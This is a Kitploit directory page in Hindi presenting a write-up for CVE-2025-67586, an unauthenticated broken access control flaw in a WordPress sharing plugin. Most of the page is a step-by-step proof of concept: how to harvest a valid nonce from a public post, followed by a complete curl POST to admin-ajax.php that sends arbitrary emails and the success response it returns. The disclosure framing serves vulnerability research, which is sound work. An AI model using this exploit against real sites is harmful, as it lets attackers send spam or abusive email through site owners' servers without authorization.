Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE — (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) के लिए राइटअप | Kitploit
उपकरण/GitHubGitHub/r0xtsec/cve
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubr0xtsec/cve

CVE

(CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) के लिए राइटअप

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE

लिखित विवरण (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) के लिए

root@kitploit:~
--------------   CVE-2025-67586 शोषण PoC   --------------
  • शोषण शीर्षक: वर्डप्रेस प्लगइन 5.2.0 - टूटा एक्सेस नियंत्रण
  • सॉफ्टवेयर लिंक: https://wordpress.org/plugins/highlight-and-share/
  • संस्करण: <= 5.2.0 (आवश्यक)
  • CVE: CVE-2025-67586

==> विवरण DLX प्लगइन्स द्वारा विकसित वर्डप्रेस प्लगइन में एक टूटा एक्सेस नियंत्रण भेद्यता मौजूद है। प्लगइन एक अप्रमाणित AJAX क्रिया को उजागर करता है जो हमलावरों को अनुमति देता है "ईमेल द्वारा साझा करें" कार्यक्षमता का उचित अनुमति जांच के बिना दुरुपयोग करने की।

एक अप्रमाणित हमलावर ईमेल साझाकरण अनुरोधों को ट्रिगर करने के लिए एक वैध पोस्ट नॉन्स का पुन: उपयोग कर सकता है, जिससे उपयोगकर्ता प्रमाणीकरण के बिना अनधिकृत ईमेल भेजना (ईमेल स्पैम / दुरुपयोग) हो सकता है।

==> आवश्यक विशेषाधिकार कोई नहीं (अप्रमाणित)

==> अवधारणा का प्रमाण (PoC)

चरण 1: स्थापित प्लगइन वाली वेबसाइट चुनें

चरण 2: एक वैध नॉन्स प्राप्त करें

  1. एक सार्वजनिक पोस्ट खोलें।
  2. टेक्स्ट को हाइलाइट करें और ईमेल द्वारा साझा करें पर क्लिक करें।
  3. डेवलपर टूल्स → नेटवर्क → XHR खोलें।
  4. एक बार ईमेल भेजें।
  5. अनुरोध कैप्चर करें जिसमें शामिल है: action=has_email_social_modal nonce= post_id=

चरण 3: अप्रमाणित अनुरोध के माध्यम से शोषण करें

bash cmd: (वेबसाइट URL, पोस्ट URL और नॉन्स बदलें)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]=' -d 'formData[toEmail]=' -d 'formData[subject]=PoC' -d 'formData[shareText]=POC test' -d 'formData[emailShareType]=selection' --compressed


[email protected]




--> अपेक्षित JSON प्रतिक्रिया:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

टूल डाउनलोड करें